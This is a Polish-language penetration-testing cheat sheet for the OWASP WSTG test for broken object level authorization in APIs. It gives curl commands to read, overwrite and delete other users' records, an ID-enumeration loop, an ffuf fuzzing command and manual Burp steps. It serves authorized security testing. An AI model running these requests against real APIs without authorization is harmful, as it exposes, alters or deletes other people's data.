================================================================================
WSTG-APIT-02 — API Broken Object Level Authorization (BOLA)
================================================================================
CELE:
- Identify whether the API enforces proper object-level authorization checks

================================================================================
KOMENDY
================================================================================

# --- IDOR na API ---
curl -s "https://TARGET/api/users/1" -H "Authorization: Bearer USER_TOKEN"
curl -s "https://TARGET/api/users/2" -H "Authorization: Bearer USER_TOKEN"
curl -s "https://TARGET/api/orders/1" -H "Authorization: Bearer USER_TOKEN"

# --- Brute force IDs ---
for i in $(seq 1 50); do echo "$i: $(curl -s -o /dev/null -w '%{http_code}' 'https://TARGET/api/users/'$i -H 'Authorization: Bearer USER_TOKEN')"; done

# --- Rozne operacje CRUD ---
curl -X GET "https://TARGET/api/users/OTHER_ID" -H "Authorization: Bearer USER_TOKEN"
curl -X PUT "https://TARGET/api/users/OTHER_ID" -H "Authorization: Bearer USER_TOKEN" -H "Content-Type: application/json" -d '{"name":"hacked"}'
curl -X DELETE "https://TARGET/api/users/OTHER_ID" -H "Authorization: Bearer USER_TOKEN"

# --- Test z roznym formatem ID ---
# Numeryczny: /api/users/123
# UUID: /api/users/550e8400-e29b-41d4-a716-446655440000
# Slug: /api/users/john-doe

================================================================================
KOMENDY Z WORDLISTAMI
================================================================================

# --- SecLists numeric IDs ---
ffuf -u "https://TARGET/api/users/FUZZ" -w Desktop/WSTG/SecLists-master/Fuzzing/4-digits-0000-9999.txt -H "Authorization: Bearer USER_TOKEN" -mc 200 -o output_ffuf_bola.json

# --- PayloadsAllTheThings IDOR ---
# Referencja: Desktop/WSTG/PayloadsAllTheThings-master/Insecure Direct Object References/README.md

================================================================================
WERYFIKACJA MANUALNA (Burp Suite / Przegladarka / DevTools)
================================================================================
1. Zidentyfikuj endpointy z ID obiektow
2. Zaloguj sie jako user A, sprobuj CRUD na obiektach user B
3. Uzyj Burp Autorize extension
4. Testuj rozne formaty ID
5. Sprawdz nested resources: /api/users/1/orders/1
